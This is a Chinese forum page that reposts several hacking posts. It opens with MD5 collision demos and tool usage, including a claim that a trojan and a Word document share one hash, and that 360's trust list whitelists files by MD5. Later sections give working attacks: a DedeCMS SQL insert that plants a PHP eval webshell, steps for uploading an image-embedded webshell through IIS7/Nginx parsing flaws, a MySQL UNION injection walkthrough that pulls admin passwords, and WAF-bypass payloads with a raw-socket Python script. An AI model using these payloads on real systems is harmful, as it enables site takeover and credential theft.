如下內容轉自幾年前其餘人發表的文章：

如下是引用片斷：

原來我老是很自信地覺得:你有本事找到 MD5 的碰撞又如何?你難道還有本事讓兩個可執行文件的 MD5 同樣,卻又都能正常運行,而且能夠作徹底不一樣的事情麼?
答:還真的能夠.

http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe

http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe

這兩個程序會在屏幕上打印出不一樣的字符，可是它們的 MD5 都是同樣的。

通讀其論文後摘要以下：

這幾位密碼學家使用的是「構造前綴碰撞法」（chosen-prefix collisions）來進行這次***（是王小云所使用的***方法的改進版本）。

他們所使用的計算機是一臺 Sony PS3，且僅用了不到兩天。

他們的結論：MD5 算法不該再被用於任何軟件完整性檢查或代碼簽名的用途。

另：如今，若是僅僅是想要生成 MD5 相同而內容不一樣的文件的話，在任何主流配置的電腦上用幾秒鐘就能夠完成了。

這幾位密碼學家編寫的「快速 MD5 碰撞生成器」：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
源代碼：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip

測了一下那2個exe md5 的確同樣的。

運行結果不同。未必對現有exe 有實質性的威脅，可是很明顯是有威脅的。若是能夠加入***。從新算出md5 的話
那就厲害了

如下是引用片斷：

用易語言編譯的兩個EXE，文件內容不一樣，可是MD5相同。有圖爲證。
兩個EXE均打包在附件裏，人格擔保EXE很純潔（爲了壓縮體積，加了UPX殼）。

若是你懷疑這兩個EXE實際上是相同的，而我只是根據某些外部特徵來實現不一樣的運行效果的話，你就盡情地測試吧。
好比你能夠把它們隨意更改文件名、複製到其餘電腦中運行、虛擬機中運行一個並在真實機器中運行另外一個，都不會有任何影響，A仍是A，B仍是B。

你可使用一些二進制編輯工具來比對兩個EXE文件，你會發現它們的不一樣。也能夠像我上傳的圖片那樣，比對包括MD5在內的其餘類型的hash。你獲得的答案仍然是：它們的文件內容不一樣，而MD5相同（其餘的HASH特徵值均不相同）。

僅供娛樂，有興趣搞清楚怎麼回事兒的，就多頂本貼，哈哈。

PS：不要罵人，說了本貼僅供娛樂，順便討論一下MD5而已。

如下是引用片斷：

用事實說話MD5破解：md5同樣兩個不一樣功能內容的文件(附md5破解工具)

能力有限，就很少說了。用事實說話，先看看下面兩個在網上滿天飛的md5同樣二內容功能不一樣的程序吧：

文件一：

File: D:\HelloWorld-colliding.exe
Size: 41792 bytes
Modified: 2010年5月21日, 15:38:12
MD5: 18FCC4334F44FED60718E7DACD82DDDF
CRC32: 8BEB795C

文件二：

File: D:\GoodbyeWorld-colliding.exe
Size: 41792 bytes
Modified: 2010年5月21日, 15:38:29
MD5: 18FCC4334F44FED60718E7DACD82DDDF
CRC32: 9EDE53DB

但是咱們能不能本身製做兩個md5 同樣而內容不一樣的文件呢？請繼續看下面的操做截圖（後附工具）

以上就是大名鼎鼎的"構造前綴法"破解md5 的方法（如下就提供破解工具和"構造前綴法"的含義）
破解工具： Fast 破解工具.7z (88.75 KB, 下載次數: 67) 2010-6-8 12:14:15 上傳下載次數: 67
下載積分: PB幣 -1

-p 前綴文件（破解工具會以此文件爲前綴構造md5碰撞文件）

-o 出處文件（默認的輸出文件名是-o msg1.bin msg2.bin）

到這裏又有人會問，能不能本身製做一個是病毒***、一個是正常無害的兩個md5 同樣的文件呢？？？

答案依舊是確定的，下載下面兩個文件你就知道了（因爲論壇不能放***之類等，因此只提供外鏈地址）
http://down.qiannao.com/space/file/ishagua/-4e0a-4f20-5206-4eab/package1.exe/.page
http://down.qiannao.com/space/file/ishagua/-4e0a-4f20-5206-4eab/package2.exe/.page
以上這兩個文件一個自解壓後是***病毒一個自解壓後是一個日常的Word 文檔

依舊會有人問，這是怎麼生成的？（這個就不能奉告了，有興趣的話本身慢慢研究吧，累了）。

如下是引用片斷：

給你們個好玩的,,關於MD5碰撞,及360的信任列表隱患，將在6點半更新

純討論
不是談怎樣利用,,,,

視頻地址:http://dl.dbank.com/c0bap33a8n

記錄:

MD5碰撞

首先
先演示一下這兩個剛碰撞出來的文件
文件名稱：C:\Documents and Settings\Administrator\桌面\1\cbi.exe
文件大小：410240 字節
修改時間：2011年10月10日 16:43:41
MD5     ：6EF59C9E016669DD3146B658D11C0A8F
SHA1    ：2580646F0803AF53E0B7E70A1A1425CE210723B3
CRC32   ：6F75148B

文件名稱：C:\Documents and Settings\Administrator\桌面\2\cbi2.exe
文件大小：410240 字節
修改時間：2011年10月10日 16:43:41
MD5     ：6EF59C9E016669DD3146B658D11C0A8F
SHA1    ：C6A32B97C2E5C9584AB6428D490A1EA1CEE3FCC4
CRC32   ：09F69A39

你們能夠看出,,兩個文件的md5值是徹底相同的
可是sh1 crc32倒是不一樣的,,說明這兩個文件不是相同文件,,可是
md5相同,這就是碰撞

再來看一下剛剛碰撞出來的360安裝包

文件名稱：C:\Documents and Settings\Administrator\桌面\cbi.exe
文件大小：32131264 字節
文件版本：8.3.0.1024
修改時間：2011年10月10日 16:34:55
MD5     ：686C066950B31203D6B688519498F943
SHA1    ：78D15715E393E7F2847F189D2F1C79BF17B3AB55
CRC32   ：6CDBAA4E

文件名稱：C:\Documents and Settings\Administrator\桌面\cbi2.exe
文件大小：32131264 字節
文件版本：8.3.0.1024
修改時間：2011年10月10日 16:34:54
MD5     ：686C066950B31203D6B688519498F943
SHA1    ：8F9A9A9036063B7596D3CE2DF151E722AFB0396A
CRC32   ：65D9B793

一樣的,md5相同 sha 和crc不一樣

如何作出這些呢 ,都來自一位叫王小云的密碼天才的思路弄的並且徹底不會影響運行

兩個安裝包皆可運行,,md5相同,,內容是不一樣的

或許不少人會說sha1呢,,,很遺憾 05年王小云把sha1也破解了,,,,,

因此,,雲在驗證這方面還有電子商務這方面都要有所改進了

不說太遠的,,迴歸話題,,說一下360本地的信任機制

能夠看到 360報毒了

接下來咱們把它添加到信任列表

不少人覺得,360的信任列表是匹配路徑的,,其實錯了,,是直接將md5加入白名單

咱們來試試把這個文件移到其餘地方

能夠看到,,這個文件運行成功了,,這驗證了

"不少人覺得,360的信任列表是匹配路徑的,,其實錯了,,是直接將md5加入白名單"

這個結論

接下來,,咱們來看看是否是必定是md5 仍是其餘算法

咱們採用相同md5,可是sha1和crc徹底相同的兩個文件來運行,,一樣的能夠運行,,由此可看出,,
360不是將路徑加入信任列表,,

而是將md5加入信任列表,,,

或許目前來看這還算安全,,雖然已經能隨意產生兩個md5徹底相同的了,,,可是用在特殊方面,,這無疑是個巨大的漏洞,,

呵呵 ,,只是想探討下

以上是相關的資料，須要其餘資料能夠本身去搜：md5 碰撞，有大量資料查閱。

實際上，MD5 值同樣，但功能不同的程序很容易實現，須要一點編程知識，及一點點技巧。。。

方法你本身多試幾回就知道了。。。

我本身寫的倆小玩意兒以下圖所演示：

MD5_碰撞測試程序_示例程序_a

MD5 Test_A.exe

MD5_碰撞測試程序_示例程序_b

MD5 Test_B.exe

MD5_碰撞測試程序_示例程序.rar：http://115.com/file/clonsfie

用到的工具以下：

一、MD5 碰撞發生器 v1.5 （MD5 Collision Generator v1.5）

二、一點點編程技巧

官方地址：http://www.win.tue.nl/hashclash/

下載地址：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

×××：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip

MD5 碰撞發生器 v1.5，MD5 Collision Generator v1.5：

MD5 碰撞發生器 v1.5

MD5 Collision Generator v1.5

示例：

fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe

fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe -o a.exe b.exe

--------------------------------------------------------

MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Allowed options:
  -h [ --help ]           顯示選項。
  -q [ --quiet ]          更簡潔。
  -i [ --ihv ] arg        使用指定的初始值。默認是MD5的初始值。
  -p [ --prefixfile ] arg 使用給定前綴的文件計算初始值，並複製數據到輸出文件。
  -o [ --out ] arg        設置輸出文件名. 這必須是最後的選項，而且必須指定兩個文件名。
                          默認: -o msg1.bin msg2.bin

--------------------------------------------------------

MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Allowed options:
  -h [ --help ]           Show options.
  -q [ --quiet ]          Be less verbose.
  -i [ --ihv ] arg        Use specified initial value. Default is MD5 initial
                          value.
  -p [ --prefixfile ] arg Calculate initial value using given prefixfile. Also
                          copies data to output files.
  -o [ --out ] arg        Set output filenames. This must be the last option
                          and exactly 2 filenames must be specified.
                          Default: -o msg1.bin msg2.bin

--------------------------------------------------------

# ***
# web***

分享回覆喜歡

Beyond SQLi: Obfuscate and Bypass

# ***
# web***

分享回覆1 喜歡

DEDECMS拿SHELL EXP

漏洞細節已經傳遍了（http://www.t00ls.net/thread-17354-1-1.html），又沒得玩了。

網傳的都是說要知道後臺才能利用，但不用，只要 plus 目錄存在，服務器能外連，就能拿shell

前題條件，必須準備好本身的dede數據庫，而後插入數據：

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');

再用下面表單提交，shell 就在同目錄下 1.php。原理本身研究。。。

</form>

function addaction()

{

document.QuickSearch.action=document.QuickSearch.doaction.value;

}

</script>

分享回覆9 喜歡

通殺IIS7.0畸形解析0day漏洞和Nginx那個0day差很少

先合併一張PHP一句話圖片馬，合併方法：
①、DOS合併：copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom，進行圖片和一句話***的合併，一句話代碼爲「

圖片隨便找一張.
【順帶着說一下edjpgcom的使用方法：打開edjpgcom.exe所在文件夾，而後把你所要修改的圖片拖動到edjpgcom.exe上面，而後edjpgcom.exe會自動打開，寫入想要些的代碼便可】
一句話:

<?PHP fputs(fopen(’shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>

而後找個nginx的站,先註冊一個用戶而後在論壇上傳一張咱們剛剛合併的圖片一句話馬。
找到圖片地址,而後在地址後面加個shell.php，在瀏覽器中運行。
好比假設圖片地址爲www.doosit.cn/tupian/1.jpg
則執行地址爲www.doosit.cn/tupian/1.jpg/shell.php
而後,會在目錄下生成shell.php。好比:www.doosit.cn/tupian/shell.php
shell.php就是咱們的一句話地址。再拿一句話的客戶端鏈接這個一句話地址就好。
上面就是Nginx拿站全過程，IIS7.0的畸形解析和這個相似。

找到某個使用IIS7.0架設的站，而後找到其中的圖片上傳點（不須要管理權限，普通註冊用戶便可搞定），把PHP大馬後綴改爲.jpg，傳上去，獲得圖片地址。

在圖片格式後面添加xx.php xx隨便你怎麼填。只要後綴爲.php就好。

<?fputs(fopen(「shell.PHP」,」w」),」<?eval(\$_POST[cmd]);?>」)?>

# web***
# ***

分享回覆喜歡

Mysql5注射技巧總結

Mysql5和以前的版本有不少不一樣的地方，靈活的運用其特性能夠在***的時候省掉不少麻煩。我試圖在本文把在《***周杰倫官方網站》中沒有寫清楚的部分表達出來，你看明白這個文章後也許你會發現，原來mysql5也能夠像mssql同樣注射。

1、原理分析

咱們先看看mysql5比以前增長的系統數據庫information_schema的結構，它是用來存儲數據庫系統信息的

mysql> use information_schema;

Database changed

mysql> show tables;

+---------------------------------------+

| Tables_in_information_schema |

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

若是讀者有興趣能夠本身裝一個mysql5研究一下這幾個表存儲的信息，我這裏只挑注射中能夠用到的幾個表。　

| SCHEMATA ――>存儲數據庫名的，

|——>關鍵字段：SCHEMA_NAME，表示數據庫名稱

| TABLES ――>存儲表名的

|——>關鍵字段：TABLE_SCHEMA表示表所屬的數據庫名稱；

TABLE_NAME表示表的名稱

| COLUMNS ――>存儲字段名的

|——>關鍵字段：TABLE_SCHEMA表示表所屬的數據庫名稱；

TABLE_NAME表示所屬的表的名稱

　　　　　　　　　COLUMN_NAME表示字段名

能夠看到，咱們只要經過注射點構造查詢語句遍相關字段，就能夠獲得咱們想要的信息了。

2、實戰測試

到網上找到一個注射點，首先仍是像以往同樣猜字段、版本和數據庫用戶,如圖１

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*

圖一

下面猜數據庫,能夠經過不斷遞增limit的第一個參數查詢到全部的數據庫名，如圖2

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15 from/**/information_schema.SCHEMATA limit 17,1/*

圖2

遍裏webbase裏面的表名，找到敏感的表，如圖三（0x77656262617365是webbase的十六進制編碼）

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.

TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1

圖3

tg_adminuser十六進制編碼爲0x74675F61646D696E75736572，依次查找該表裏面的字段名，如圖4，圖5

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.

COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1

圖4

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.

COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/2,1

圖五

數據庫，表名，字段咱們都知道了，查出密碼就很簡單了，如圖六

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
圖6

文章就到這裏結束了，懂點sql語法的朋友應該看的比較明白了：）

轉自 WEB***

# web***

分享回覆喜歡

淺談繞過WAF的數種方法(轉載)

0×00 前言

08年初誕生了一種SQL羣注***，***在全球範圍內對asp，asp.net加MSSQL架構的網站進行了瘋狂掃蕩。因爲MSSQL支持多語句注入，***經過一條結合遊標的SQL語句就能將整個數據庫的字段內容自動進行篡改，能夠在網站上無差異的進行網頁******。

互聯網是快速更新迭代的，可是不少沒有開發能力的單位都是經過外包創建網站，網站的程序一上線就再也無人維護，不少程序存在各類漏洞沒法修補，因而WAF便有了市場，現今門檻低且最能解決問題的是針對IIS/apache的軟件WAF，一般一個模塊一個擴展就能搞定，固然也有耗資百萬千萬的硬件WAF，然而若是WAF攔截規則出現漏洞，這百萬千萬的硬件也就是一堆廢鐵。那麼WAF是否真的能夠解決全部的WEB安全問題呢？因此本文主要解析一些能夠繞過WAF的罕見漏洞，供安全人員參考。

0×01 Request對象的包解析漏洞.

asp和asp.net的Request對象存在一個包解析漏洞，Request對象對於GET和POST包的解析過於寬鬆，用一句話表達就是Request對象它GET和POST傻傻分不清楚，稍有點web開發經驗的同窗應該知道Request接收GET,POST,COOKIE也就是GPC傳過來的數據，可是asp和.net庫內置的Request對象徹底不按RFC標準來，下面咱們能夠作個測試：

分別將下面兩段代碼保存爲1.asp和1.aspx

使用asp的Request對象接收t參數傳值
———————————————–
＜%
Response.Write 「Request:」 & Request(「t」)
%＞
———————————————–

使用asp.net的Request對象接收t參數傳值
———————————————–
＜%@ Page Language=」C#」 %＞
＜%
string test = Request["t"];
Response.Write(「Request:」+test);
%＞
———————————————–

使用下面的python腳本調用socket發送原始的HTTP包
———————————————–
#!/usr/bin/env python

import socket

host = ’192.168.239.129′
path = ‘/1.asp’
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

exploit_packet=」t=’/**/or/**/1=1–」
exploit_packet+=」\r\n」 * 8
packet_length = len(exploit_packet)
packet=’GET ‘ + path + ‘ HTTP/1.1\r\n’
packet+=’Host: ‘ + host + ‘\r\n’
packet+=’Content-Length: %s\r\n’ % packet_length
packet+=’Content-Type: application/x-www-form-urlencoded\r\n’
packet+=’\r\n’
packet = packet + exploit_packet

print packet
s.send(packet)
buf = s.recv(1000)
if buf: print buf[buf.rfind("\r\n"):]
s.close()
———————————————–

咱們發送的原始包是：
GET /1.asp HTTP/1.1
Host: 192.168.239.129
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

t=’/**/or/**/1=1–

結果返回以下：
Request:’/**/or/**/1=1–
將python測試腳本的path改成/1.aspx測試頁返回一樣結果。

咱們能夠看到這是一個畸形的HTTP GET請求包，這個包的奧祕在於t=’/**/or/**/1=1–參數後的8個回車換行和Content-Length頭，包的結構相似於一個POST包，而請求的方法是GET,最後asp和asp.net的Request對象成功的解析了這個畸形包取出了數據。

因此若是WAF沒有處理好HTTP包的內容，沿用常規思路處理GET和POST的邏輯的話，那麼這個畸形包將會毀掉WAF的基礎防護。

0×02 被遺忘的復參***.

你們應該還記得09年的HTTP Parameter Pollution***，查看[3]文檔，能夠發現ASP/IIS和ASP.NET/IIS的場景下存在一個復參特性，本文將利用這種的特性的***簡稱爲復參***，用0X01裏的例子簡單的測試一下:

用GET請求傳入兩個t參數
GET http://192.168.239.129/1.asp?t=1&t=2
將返回
Request:1, 2

asp和asp.net的Request對象接收了兩個參數，而且以逗號分隔，因此便衍生出了[3]文檔中的復參SQL注入方法：

Vulnerable code：
SQL=」select key from table where id=」+Request.QueryString(「id」)

This request is successfully performed using the HPP technique：
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

The SQL request becomes：
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,

咱們能夠看到經過巧妙的運用註釋符結合復參特性能夠分割GET參數中的SQL注入語句，若是WAF對GET參數的處理過於簡單是否是會匹配不到攔截規則呢?

0×03 高級復參***.

ASP.NET的Request對象有一個Params屬性，ASP.NET程序員在一些程序中會使用Request.Params["xxx"]傳入數據，參考[4]微軟MSDN文檔咱們能夠知道Params屬性的特性，該屬性接收GET,POST和Cookie的傳值集合，這裏咱們能夠修改0×01裏的例子測試一下：

使用asp.net的Request.Params方法接收t參數傳值
———————————————–
＜%@ Page Language=」C#」 %＞
＜%
string test = Request.Params["t"];
Response.Write(「Request:」+test);
%＞
———————————————–

發送一個POST包，GET,POST,COOKIE三個方法中都帶有不一樣的t參數內容
———————————————–
POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1
Host: 192.168.239.129
Cookie: t=2

t=3
———————————————–

結果返回
Request:1,3,2

最後得出結論，Request.Params方法接收的數據是按照GPC順序整合，看到這裏的同窗再聯想到0×02的復參***應該如醍醐灌頂了，咱們能夠將SQL***語句拆分到GET,POST,COOKIE三個變量裏進行組合***。想想WAF針對這種高級復參***是否防護好了？

0×04 後話

WAF是不可能解決全部安全問題的，本文的思路歸其本源其實是描敘了WAF處理HTTP包與服務端處理HTTP包數種差別。互聯網是不斷更新迭代的，差別存在，相似的漏洞也會存在。
本文提到了三種繞過WAF的思路，第一種是個人原創屬於0DAY狀態，第二種是參考已有的復參***，其中第三種高級復參***是由Safe3同窗提出的，本文也是與Safe3同窗討論他開發的WAF的BUG而來，因此感謝Safe3同窗。
另外請你們不要將本文的內容用於非法途徑，僅供安全人員參考，謝謝。

參考：
[1].http://www.faqs.org/rfcs/rfc2616.html
[2].http://www.w3school.com.cn/asp/asp_ref_request.asp
[3].http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
[4].http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx

Comments (0)

本站內容均爲原創，轉載請務必保留署名與連接！
淺談繞過WAF的數種方法:http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html

相關標籤/搜索